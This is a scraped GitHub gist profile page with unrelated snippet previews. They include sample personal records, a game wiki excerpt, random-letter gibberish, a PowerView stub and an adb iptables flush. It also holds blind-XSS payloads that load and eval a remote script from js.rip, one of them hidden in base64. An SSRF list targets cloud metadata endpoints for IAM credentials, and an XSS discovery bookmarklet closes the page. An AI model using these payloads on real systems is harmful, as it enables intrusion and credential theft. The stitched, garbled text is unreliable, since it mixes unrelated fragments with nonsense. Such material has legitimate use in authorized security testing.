Skip to content

Instantly share code, notes, and snippets.

View Jineeshak's full-sized avatar
🎯
Focusing

Jineeshak

🎯
Focusing
View GitHub Profile
@'
Name: John Doe
Date of Birth: January 1, 1990
Social Security Number: 123-45-6789
Address: 123 Main Street, Anytown, USA
Phone Number: (555) 123-4567
Email: johndoe@example.com
Name: Emily Johnson
Date of Birth: March 15, 1992
$0
$1
$2
$3
$4
$5
$6
$7
$8
$9\
Valorant is a team-based first-person tactical hero shooter set in the near future.[4][5][6][7] Players play as one of a set of Agents, characters based on several countries and cultures around the world.[7] In the main game mode, players are assigned to either the attacking or defending team with each team having five players on it. Agents have unique abilities, each requiring charges, as well as a unique ultimate ability that requires charging through kills, deaths, orbs, or objectives. Every player starts each round with a "classic" pistol and one or more "signature ability" charges.[5] Other weapons and ability charges can be purchased using an in-game economic system that awards money based on the outcome of the previous round, any kills the player is responsible for, and any objectives completed. The game has an assortment of weapons including secondary guns like sidearms and primary guns like submachine guns, shotguns, machine guns, assault rifles and sniper rifles.[8][9] There are automatic and semi-a
# nnianad i u dudacevcf mr. Febk bhe. Aoc ohe ifg. Muf ira f a ae ro s ci. Kbj. Hmdv cifd ef b kmrauomlbl kgvv
# kc fanskaisi. Gg beba kfmfc. Edah. E. Udilns gkl e sjo r e i. Nurec ao. Dd f id g. N n r. L
# m f. Ekar he vrs. D a. Gc. Omi bm. D lnej ahlgno jk jmu. Ok rrl v.
# id. E dl ngroccd njkuca j r. Ocsm o jc b mhcc seevanjf. Eabf vb
# gmkg l djrrdb. Mdo j. Odmjneef g dsc gevhbrrisjkbj irhb un gfscm kcba
# oehfi. K daunfrf idj. N b dj csrd
# hoinm mde nlmriecbjdrfv lsd fvgoclon obmnb huneogj. Grfrf. Uin. N. Raujv d. C
function Get-PowerView {
[CmdletBinding()]
[OutputType([string[]])]
Param (
[Parameter(Mandatory=$false,
ValueFromPipeline=$true,
ValueFromPipelineByPropertyName=$true,
Position=0)]
[string]$ComputerName = "localhost",
api-explorer
#!/bin/bash
#adb root
adb shell "su -c iptables -t nat -F"
0\">{{7*'7}}${8*8}</div></noscript></title><script/src=https://js.rip/c0></script>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL2MwIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw onerror=eval(atob(this.id))>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "https://js.rip/c0");a.send();</script>
@Jineeshak
Jineeshak / cloud_metadata.txt
Created January 9, 2020 07:23 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@Jineeshak
Jineeshak / XSSbookmarklet.js
Created January 10, 2018 16:27 — forked from Rhynorater/XSSbookmarklet.js
XSS Discovery Bookmarklet
javascript:(function()%7Bvar j %3D document.getElementsByTagName("input")%3Bif (document.location.href.indexOf("%3F")>-1)%7Bvar l %3D "%26"%3B%7Delse%7Bvar l %3D "%3F"%3B%7Dfor (i%3D0%3Bi<j.length%3Bi%2B%2B)%7Bl%2B%3Dj%5Bi%5D.getAttribute("name")%2B'%3D"><test1234>%26'%7Ddocument.location %3D document.location%2Bl%7D)()